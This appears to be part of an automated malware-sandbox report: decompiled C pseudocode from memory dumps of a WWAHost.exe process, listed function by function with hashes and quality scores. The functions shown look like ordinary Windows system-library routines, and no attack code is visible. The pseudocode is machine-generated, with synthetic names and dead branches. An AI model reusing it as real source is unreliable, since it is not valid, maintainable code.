                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                              • Instruction ID: 82926546769700d76de008aab698d13a25cf1310d67afa493610c1a50028648b
                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                              • Instruction Fuzzy Hash: 58516D71600606EFDB15CF18C480A56FBB9FF49304F19C1AAE9089F252E772EA46CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 97%
                                              			E03982990() {
                                              				signed int* _t62;
                                              				signed int _t64;
                                              				intOrPtr _t66;
                                              				signed short* _t69;
                                              				intOrPtr _t76;
                                              				signed short* _t79;
                                              				void* _t81;
                                              				signed int _t82;
                                              				signed short* _t83;
                                              				signed int _t87;
                                              				intOrPtr _t91;
                                              				void* _t98;
                                              				signed int _t99;
                                              				void* _t101;
                                              				signed int* _t102;
                                              				void* _t103;
                                              				void* _t104;
                                              				void* _t107;
                                              
                                              				_push(0x20);
                                              				_push(0x3a2ff00);
                                              				E039AD08C(_t81, _t98, _t101);
                                              				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                              				_t99 = 0;
                                              				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                              				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                              				if(_t82 == 0) {
                                              					_t62 = 0xc0000100;
                                              				} else {
                                              					 *((intOrPtr*)(_t103 - 4)) = 0;
                                              					_t102 = 0xc0000100;
                                              					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                              					_t64 = 4;
                                              					while(1) {
                                              						 *(_t103 - 0x24) = _t64;
                                              						if(_t64 == 0) {
                                              							break;
                                              						}
                                              						_t87 = _t64 * 0xc;
                                              						 *(_t103 - 0x2c) = _t87;
                                              						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3931664));
                                              						if(_t107 <= 0) {
                                              							if(_t107 == 0) {
                                              								_t79 = E0399E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3931668)), _t82);
                                              								_t104 = _t104 + 0xc;
                                              								__eflags = _t79;
                                              								if(__eflags == 0) {
                                              									_t102 = E039D51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x393166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                              									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                              									break;
                                              								} else {
                                              									_t64 =  *(_t103 - 0x24);
                                              									goto L5;
                                              								}
                                              								goto L13;
                                              							} else {
                                              								L5:
                                              								_t64 = _t64 - 1;
                                              								continue;
                                              							}
                                              						}
                                              						break;
                                              					}
                                              					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                              					__eflags = _t102;
                                              					if(_t102 < 0) {
                                              						__eflags = _t102 - 0xc0000100;
                                              						if(_t102 == 0xc0000100) {
                                              							_t83 =  *((intOrPtr*)(_t103 + 8));
                                              							__eflags = _t83;
                                              							if(_t83 != 0) {
                                              								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                              								__eflags =  *_t83 - _t99;
                                              								if( *_t83 == _t99) {
                                              									_t102 = 0xc0000100;
                                              									goto L19;
                                              								} else {
                                              									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                              									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                              									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                              									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                              										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                              										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                              											L26:
                                              											_t102 = E03982AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                              											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                              											__eflags = _t102 - 0xc0000100;
                                              											if(_t102 != 0xc0000100) {
                                              												goto L12;
                                              											} else {
                                              												_t99 = 1;
                                              												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                              												goto L18;
                                              											}
                                              										} else {
                                              											_t69 = E03966600( *((intOrPtr*)(_t91 + 0x1c)));
                                              											__eflags = _t69;
                                              											if(_t69 != 0) {
                                              												goto L26;
                                              											} else {
                                              												_t83 =  *((intOrPtr*)(_t103 + 8));
                                              												goto L18;
                                              											}
                                              										}
                                              									} else {
                                              										L18:
                                              										_t102 = E03982C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                              										L19:
                                              										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                              										goto L12;
                                              									}
                                              								}
                                              								L28:
                                              							} else {
                                              								E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              								 *((intOrPtr*)(_t103 - 4)) = 1;
                                              								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                              								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                              								_t76 = E03982AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                              								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                              								__eflags = _t76 - 0xc0000100;
                                              								if(_t76 == 0xc0000100) {
                                              									 *((intOrPtr*)(_t103 - 0x1c)) = E03982C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                              								}
                                              								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                              								E03982ACB();
                                              							}
                                              						}
                                              					}
                                              					L12:
                                              					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                              					_t62 = _t102;
                                              				}
                                              				L13:
                                              				return E039AD0D1(_t62);
                                              				goto L28;
                                              			}






















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db1d3c68b5e024a822822cfed78e0aef0c224b8434ed1f6678ecf94500003feb
                                              • Instruction ID: 62f1d7127991bd0e8141a45046ef4b21305e5d9ac1c36ce973fa190d42a5c23b
                                              • Opcode Fuzzy Hash: db1d3c68b5e024a822822cfed78e0aef0c224b8434ed1f6678ecf94500003feb
                                              • Instruction Fuzzy Hash: BC518975900209DFDF25EF95C980ADEBBB9BF88750F158859E850AB260C335DD52CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 85%
                                              			E03984BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                              				signed int _v8;
                                              				short _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				char _v36;
                                              				char _v156;
                                              				short _v158;
                                              				intOrPtr _v160;
                                              				char _v164;
                                              				intOrPtr _v168;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t45;
                                              				intOrPtr _t74;
                                              				signed char _t77;
                                              				intOrPtr _t84;
                                              				char* _t85;
                                              				void* _t86;
                                              				intOrPtr _t87;
                                              				signed short _t88;
                                              				signed int _t89;
                                              
                                              				_t83 = __edx;
                                              				_v8 =  *0x3a4d360 ^ _t89;
                                              				_t45 = _a8 & 0x0000ffff;
                                              				_v158 = __edx;
                                              				_v168 = __ecx;
                                              				if(_t45 == 0) {
                                              					L22:
                                              					_t86 = 6;
                                              					L12:
                                              					E0395CC50(_t86);
                                              					L11:
                                              					return E0399B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                              				}
                                              				_t77 = _a4;
                                              				if((_t77 & 0x00000001) != 0) {
                                              					goto L22;
                                              				}
                                              				_t8 = _t77 + 0x34; // 0xdce0ba00
                                              				if(_t45 !=  *_t8) {
                                              					goto L22;
                                              				}
                                              				_t9 = _t77 + 0x24; // 0x3a48504
                                              				E03972280(_t9, _t9);
                                              				_t87 = 0x78;
                                              				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                              				E0399FA60( &_v156, 0, _t87);
                                              				_t13 = _t77 + 0x30; // 0x3db8
                                              				_t85 =  &_v156;
                                              				_v36 =  *_t13;
                                              				_v28 = _v168;
                                              				_v32 = 0;
                                              				_v24 = 0;
                                              				_v20 = _v158;
                                              				_v160 = 0;
                                              				while(1) {
                                              					_push( &_v164);
                                              					_push(_t87);
                                              					_push(_t85);
                                              					_push(0x18);
                                              					_push( &_v36);
                                              					_push(0x1e);
                                              					_t88 = E0399B0B0();
                                              					if(_t88 != 0xc0000023) {
                                              						break;
                                              					}
                                              					if(_t85 !=  &_v156) {
                                              						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                              					}
                                              					_t84 = L03974620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                              					_v168 = _v164;
                                              					if(_t84 == 0) {
                                              						_t88 = 0xc0000017;
                                              						goto L19;
                                              					} else {
                                              						_t74 = _v160 + 1;
                                              						_v160 = _t74;
                                              						if(_t74 >= 0x10) {
                                              							L19:
                                              							_t86 = E0395CCC0(_t88);
                                              							if(_t86 != 0) {
                                              								L8:
                                              								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                              								_t30 = _t77 + 0x24; // 0x3a48504
                                              								E0396FFB0(_t77, _t84, _t30);
                                              								if(_t84 != 0 && _t84 !=  &_v156) {
                                              									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                              								}
                                              								if(_t86 != 0) {
                                              									goto L12;
                                              								} else {
                                              									goto L11;
                                              								}
                                              							}
                                              							L6:
                                              							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                              							if(_v164 != 0) {
                                              								_t83 = _t84;
                                              								E03984F49(_t77, _t84);
                                              							}
                                              							goto L8;
                                              						}
                                              						_t87 = _v168;
                                              						continue;
                                              					}
                                              				}
                                              				if(_t88 != 0) {
                                              					goto L19;
                                              				}
                                              				goto L6;
                                              			}



























                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be5fea4905292fd4fb111e50de2fd8e98ae8f477151be1b92067b3f6110608ad
                                              • Instruction ID: a29ea567bc715679a7135ce45f5cd64f8116886337e6d16e863ceebc55bfd239
                                              • Opcode Fuzzy Hash: be5fea4905292fd4fb111e50de2fd8e98ae8f477151be1b92067b3f6110608ad
                                              • Instruction Fuzzy Hash: 9D41B635A003299BDF20EF69C940BEAB7BCEF85750F0504A9E908AB240D774DE85CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 78%
                                              			E03984D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                              				signed int _v12;
                                              				char _v176;
                                              				char _v177;
                                              				char _v184;
                                              				intOrPtr _v192;
                                              				intOrPtr _v196;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed short _t42;
                                              				char* _t44;
                                              				intOrPtr _t46;
                                              				intOrPtr _t50;
                                              				char* _t57;
                                              				intOrPtr _t59;
                                              				intOrPtr _t67;
                                              				signed int _t69;
                                              
                                              				_t64 = __edx;
                                              				_v12 =  *0x3a4d360 ^ _t69;
                                              				_t65 = 0xa0;
                                              				_v196 = __edx;
                                              				_v177 = 0;
                                              				_t67 = __ecx;
                                              				_v192 = __ecx;
                                              				E0399FA60( &_v176, 0, 0xa0);
                                              				_t57 =  &_v176;
                                              				_t59 = 0xa0;
                                              				if( *0x3a47bc8 != 0) {
                                              					L3:
                                              					while(1) {
                                              						asm("movsd");
                                              						asm("movsd");
                                              						asm("movsd");
                                              						asm("movsd");
                                              						_t67 = _v192;
                                              						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                              						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                              						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                              						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                              						_push( &_v184);
                                              						_push(_t59);
                                              						_push(_t57);
                                              						_push(0xa0);
                                              						_push(_t57);
                                              						_push(0xf);
                                              						_t42 = E0399B0B0();
                                              						if(_t42 != 0xc0000023) {
                                              							break;
                                              						}
                                              						if(_v177 != 0) {
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                              						}
                                              						_v177 = 1;
                                              						_t44 = L03974620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                              						_t59 = _v184;
                                              						_t57 = _t44;
                                              						if(_t57 != 0) {
                                              							continue;
                                              						} else {
                                              							_t42 = 0xc0000017;
                                              							break;
                                              						}
                                              					}
                                              					if(_t42 != 0) {
                                              						_t65 = E0395CCC0(_t42);
                                              						if(_t65 != 0) {
                                              							L10:
                                              							if(_v177 != 0) {
                                              								if(_t57 != 0) {
                                              									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                              								}
                                              							}
                                              							_t46 = _t65;
                                              							L12:
                                              							return E0399B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                              						}
                                              						L7:
                                              						_t50 = _a4;
                                              						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                              						if(_t50 != 3) {
                                              							if(_t50 == 2) {
                                              								goto L8;
                                              							}
                                              							L9:
                                              							if(E0399F380(_t67 + 0xc, 0x3935138, 0x10) == 0) {
                                              								 *0x3a460d8 = _t67;
                                              							}
                                              							goto L10;
                                              						}
                                              						L8:
                                              						_t64 = _t57 + 0x28;
                                              						E03984F49(_t67, _t57 + 0x28);
                                              						goto L9;
                                              					}
                                              					_t65 = 0;
                                              					goto L7;
                                              				}
                                              				if(E03984E70(0x3a486b0, 0x3985690, 0, 0) != 0) {
                                              					_t46 = E0395CCC0(_t56);
                                              					goto L12;
                                              				} else {
                                              					_t59 = 0xa0;
                                              					goto L3;
                                              				}
                                              			}





















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c56ebe64aeda5536a2c11ef510cf1143bae06adf734b02805af8d6e2ebfbdb60
                                              • Instruction ID: bdef921717ad10cbff8f18d92fd3e966f46d46af4fa71f60225aab0b3aec74ea
                                              • Opcode Fuzzy Hash: c56ebe64aeda5536a2c11ef510cf1143bae06adf734b02805af8d6e2ebfbdb60
                                              • Instruction Fuzzy Hash: 0F41F275A40318AFEB31EF15CC80FAAB7ADEF85750F08049AE9459B281D774ED40CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E03968A0A(intOrPtr* __ecx, signed int __edx) {
                                              				signed int _v8;
                                              				char _v524;
                                              				signed int _v528;
                                              				void* _v532;
                                              				char _v536;
                                              				char _v540;
                                              				char _v544;
                                              				intOrPtr* _v548;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t44;
                                              				void* _t46;
                                              				void* _t48;
                                              				signed int _t53;
                                              				signed int _t55;
                                              				intOrPtr* _t62;
                                              				void* _t63;
                                              				unsigned int _t75;
                                              				signed int _t79;
                                              				unsigned int _t81;
                                              				unsigned int _t83;
                                              				signed int _t84;
                                              				void* _t87;
                                              
                                              				_t76 = __edx;
                                              				_v8 =  *0x3a4d360 ^ _t84;
                                              				_v536 = 0x200;
                                              				_t79 = 0;
                                              				_v548 = __edx;
                                              				_v544 = 0;
                                              				_t62 = __ecx;
                                              				_v540 = 0;
                                              				_v532 =  &_v524;
                                              				if(__edx == 0 || __ecx == 0) {
                                              					L6:
                                              					return E0399B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                              				} else {
                                              					_v528 = 0;
                                              					E0396E9C0(1, __ecx, 0, 0,  &_v528);
                                              					_t44 = _v528;
                                              					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                              					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                              					_t46 = 0xa;
                                              					_t87 = _t81 - _t46;
                                              					if(_t87 > 0 || _t87 == 0) {
                                              						 *_v548 = 0x3931180;
                                              						L5:
                                              						_t79 = 1;
                                              						goto L6;
                                              					} else {
                                              						_t48 = E03981DB5(_t62,  &_v532,  &_v536);
                                              						_t76 = _v528;
                                              						if(_t48 == 0) {
                                              							L9:
                                              							E03993C2A(_t81, _t76,  &_v544);
                                              							 *_v548 = _v544;
                                              							goto L5;
                                              						}
                                              						_t62 = _v532;
                                              						if(_t62 != 0) {
                                              							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                              							_t53 =  *_t62;
                                              							_v528 = _t53;
                                              							if(_t53 != 0) {
                                              								_t63 = _t62 + 4;
                                              								_t55 = _v528;
                                              								do {
                                              									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                              										if(E03968999(_t63,  &_v540) == 0) {
                                              											_t55 = _v528;
                                              										} else {
                                              											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                              											_t55 = _v528;
                                              											if(_t75 >= _t83) {
                                              												_t83 = _t75;
                                              											}
                                              										}
                                              									}
                                              									_t63 = _t63 + 0x14;
                                              									_t55 = _t55 - 1;
                                              									_v528 = _t55;
                                              								} while (_t55 != 0);
                                              								_t62 = _v532;
                                              							}
                                              							if(_t62 !=  &_v524) {
                                              								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                              							}
                                              							_t76 = _t83 & 0x0000ffff;
                                              							_t81 = _t83 >> 0x10;
                                              						}
                                              						goto L9;
                                              					}
                                              				}
                                              			}




























                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0992f43a0a228fd0a8f6457a029eba29722c309ffe95c9d0f0d3be39e9d58c84
                                              • Instruction ID: ea5d660416212a1d177031d6ba1c4be34441f41d666018bd8a15fedddfa2cbea
                                              • Opcode Fuzzy Hash: 0992f43a0a228fd0a8f6457a029eba29722c309ffe95c9d0f0d3be39e9d58c84
                                              • Instruction Fuzzy Hash: 9D4170B5A4532D9BDF24DF69CC88AAAB3F8FB84340F1445EAD81997251E7709E80CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E03A1AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                              				intOrPtr _v8;
                                              				char _v12;
                                              				signed int _v16;
                                              				signed char _v20;
                                              				intOrPtr _v24;
                                              				char* _t37;
                                              				void* _t47;
                                              				signed char _t51;
                                              				void* _t53;
                                              				char _t55;
                                              				intOrPtr _t57;
                                              				signed char _t61;
                                              				intOrPtr _t75;
                                              				void* _t76;
                                              				signed int _t81;
                                              				intOrPtr _t82;
                                              
                                              				_t53 = __ecx;
                                              				_t55 = 0;
                                              				_v20 = _v20 & 0;
                                              				_t75 = __edx;
                                              				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                              				_v24 = __edx;
                                              				_v12 = 0;
                                              				if((_t81 & 0x01000000) != 0) {
                                              					L5:
                                              					if(_a8 != 0) {
                                              						_t81 = _t81 | 0x00000008;
                                              					}
                                              					_t57 = E03A1ABF4(_t55 + _t75, _t81);
                                              					_v8 = _t57;
                                              					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                              						_t76 = 0;
                                              						_v16 = _v16 & 0;
                                              					} else {
                                              						_t59 = _t53;
                                              						_t76 = E03A1AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                              						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                              							_t47 = E03A1AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                              							_t61 = _v20;
                                              							if(_t61 != 0) {
                                              								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                              								if(E039FCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                              									L039777F0(_t53, 0, _t76);
                                              									_t76 = 0;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					_t82 = _v8;
                                              					L16:
                                              					if(E03977D50() == 0) {
                                              						_t37 = 0x7ffe0380;
                                              					} else {
                                              						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              					}
                                              					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                              						E03A1131B(_t53, _t76, _t82, _v16);
                                              					}
                                              					return _t76;
                                              				}
                                              				_t51 =  *(__ecx + 0x20);
                                              				_v20 = _t51;
                                              				if(_t51 == 0) {
                                              					goto L5;
                                              				}
                                              				_t81 = _t81 | 0x00000008;
                                              				if(E039FCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                              					_t55 = _v12;
                                              					goto L5;
                                              				} else {
                                              					_t82 = 0;
                                              					_t76 = 0;
                                              					_v16 = _v16 & 0;
                                              					goto L16;
                                              				}
                                              			}




















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                              • Instruction ID: 7b5b8891c6bc1ce9e36c6fb0693b08725e0e096478cbb3b0e151ba45ac348c25
                                              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                              • Instruction Fuzzy Hash: 2631E436F162846BDB15CBA9C945BBFF7BAEF84210F09806EE805AB391DA749D10C750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 76%
                                              			E03A1FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                              				char _v8;
                                              				signed int _v12;
                                              				signed int _t29;
                                              				char* _t32;
                                              				char* _t43;
                                              				signed int _t80;
                                              				signed int* _t84;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t56 = __edx;
                                              				_t84 = __ecx;
                                              				_t80 = E03A1FD4E(__ecx, __edx);
                                              				_v12 = _t80;
                                              				if(_t80 != 0) {
                                              					_t29 =  *__ecx & _t80;
                                              					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                              					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                              						E03A20A13(__ecx, _t80, 0, _a4);
                                              						_t80 = 1;
                                              						if(E03977D50() == 0) {
                                              							_t32 = 0x7ffe0380;
                                              						} else {
                                              							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              						}
                                              						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                              							_push(3);
                                              							L21:
                                              							E03A11608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                              						}
                                              						goto L22;
                                              					}
                                              					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                              						_t80 = E03A22B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                              						if(_t80 != 0) {
                                              							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                              							_t77 = _v8;
                                              							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                              								E03A1C8F7(_t66, _t77, 0);
                                              							}
                                              						}
                                              					} else {
                                              						_t80 = E03A1DBD2(__ecx[0xb], _t74, __edx, _a4);
                                              					}
                                              					if(E03977D50() == 0) {
                                              						_t43 = 0x7ffe0380;
                                              					} else {
                                              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              					}
                                              					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                              						goto L22;
                                              					} else {
                                              						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                              						goto L21;
                                              					}
                                              				} else {
                                              					_push(__ecx);
                                              					_push(_t80);
                                              					E03A1A80D(__ecx[0xf], 9, __edx, _t80);
                                              					L22:
                                              					return _t80;
                                              				}
                                              			}











                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                              • Instruction ID: b38355e1b7a5868aa0e852436bb83381307f7232193feb0348b8a3bb5777ef88
                                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                              • Instruction Fuzzy Hash: 4731283A304B806FD732DB68C944F6ABBEAEBC5250F1C425AE4468B782DA74DC61C710
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E03A1EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                              				signed int _v8;
                                              				char _v12;
                                              				intOrPtr _v15;
                                              				char _v16;
                                              				intOrPtr _v19;
                                              				void* _v28;
                                              				intOrPtr _v36;
                                              				void* __ebx;
                                              				void* __edi;
                                              				signed char _t26;
                                              				signed int _t27;
                                              				char* _t40;
                                              				unsigned int* _t50;
                                              				intOrPtr* _t58;
                                              				unsigned int _t59;
                                              				char _t75;
                                              				signed int _t86;
                                              				intOrPtr _t88;
                                              				intOrPtr* _t91;
                                              
                                              				_t75 = __edx;
                                              				_t91 = __ecx;
                                              				_v12 = __edx;
                                              				_t50 = __ecx + 0x30;
                                              				_t86 = _a4 & 0x00000001;
                                              				if(_t86 == 0) {
                                              					E03972280(_t26, _t50);
                                              					_t75 = _v16;
                                              				}
                                              				_t58 = _t91;
                                              				_t27 = E03A1E815(_t58, _t75);
                                              				_v8 = _t27;
                                              				if(_t27 != 0) {
                                              					E0395F900(_t91 + 0x34, _t27);
                                              					if(_t86 == 0) {
                                              						E0396FFB0(_t50, _t86, _t50);
                                              					}
                                              					_push( *((intOrPtr*)(_t91 + 4)));
                                              					_push( *_t91);
                                              					_t59 =  *(_v8 + 0x10);
                                              					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                              					_push(0x8000);
